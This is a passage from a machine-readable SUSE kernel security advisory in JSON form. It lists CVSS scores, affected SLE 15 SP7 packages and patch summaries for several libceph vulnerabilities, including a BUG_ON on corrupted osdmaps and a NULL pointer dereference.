"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
